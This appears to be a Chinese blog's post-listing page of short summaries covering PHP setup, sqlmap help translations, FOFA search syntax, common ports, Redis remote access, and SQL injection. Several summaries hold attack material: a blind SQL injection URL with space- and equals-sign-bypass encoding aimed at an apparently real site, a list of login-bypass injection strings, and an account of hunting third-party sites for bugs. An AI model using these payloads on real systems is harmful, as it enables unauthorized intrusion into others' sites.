摘要: PHP环境安装: 准备:apache、PHP、MySQL 1)apache配置 解压,找到“conf/httpd.conf”,打开,修改: 将”c:/Apache24”全部替换为”解压后的路径(bin)” 配置服务器域名: 搜索”ServerName” 找到: #ServerName www.exa 阅读全文
posted @ 2021-07-18 12:49 admin32 阅读(133) 评论(0) 推荐(0)
摘要: 上级要求每天找三个漏洞,本人太菜,只能看漏洞库,各种百度找站来搞。本来想找SQL注入的站,于是fofa找header="admin.php",奈何找不到,倒是看到很多站显示Copyright H-UI ADMIN啥的,于是在百度上试试搜索Copyright H-UI ADMIN,无意间发现一个这样的 阅读全文
posted @ 2021-07-13 11:39 admin32 阅读(2856) 评论(0) 推荐(0)
摘要: google翻译: 用法:sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 详细级别:0-6(默认为 1) 目标: 必须至少提供这些选项中的一个来定义 目标 -u UR 阅读全文
posted @ 2021-07-10 00:00 admin32 阅读(1608) 评论(0) 推荐(0)
摘要: google翻译如下: 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 详细级别:0-6(默认为 1) 目标: 必须至少提供这些选项中的一个来定义 目标 -u URL, --url=URL 目标 阅读全文
posted @ 2021-07-09 22:34 admin32 阅读(45) 评论(0) 推荐(0)
摘要: 参考: https://www.cnblogs.com/loopkep/p/11135949.html 查看端口: nmap -A -p 6379 ?script redis-info 192.168.242.134 远程连接: ./redis-cli -h 192.168.242.134 阅读全文
posted @ 2021-07-07 16:44 admin32 阅读(36) 评论(0) 推荐(0)
摘要: 当过滤了空格和=用%0a代替空格,%3d代替= 布尔盲注https://blog.csdn.net/silence1_/article/details/90812612 例子:http://www.bhxz.net/?list_7'%0aand%0adatabase()%3d'bhxz'%0aand 阅读全文
posted @ 2021-07-06 16:25 admin32 阅读(117) 评论(0) 推荐(0)
摘要: 参考链接: https://www.cnblogs.com/wanghaihong200/p/8727450.html 阅读全文
posted @ 2021-07-05 14:54 admin32 阅读(44) 评论(0) 推荐(0)
摘要: 21,22,23,25,53,67,80,443,445,1433,3306,3389,6379,8009,8080 阅读全文
posted @ 2021-07-04 19:38 admin32 阅读(221) 评论(0) 推荐(0)
摘要: 直接输入查询语句,将从标题,html内容,http头信息,url字段中搜索; 如果查询表达式有多个与或关系,尽量在外面用()包含起来; 新增==完全匹配的符号,可以加快搜索速度,比如查找qq.com所有host,可以是domain=="qq.com" 可以使用括号 和 && || !=等符号,如 t 阅读全文
posted @ 2021-07-04 13:13 admin32 阅读(2840) 评论(0) 推荐(0)
摘要: asp: admin'or'='or' aspx: "or "a"="a')or('a'='aor 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or'a'='a"or"="a'='a'or''=''or'='or'1 or '1'='1'=11 or ' 阅读全文
posted @ 2021-07-03 22:38 admin32 阅读(774) 评论(0) 推荐(0)
点击右上角即可分享
微信分享提示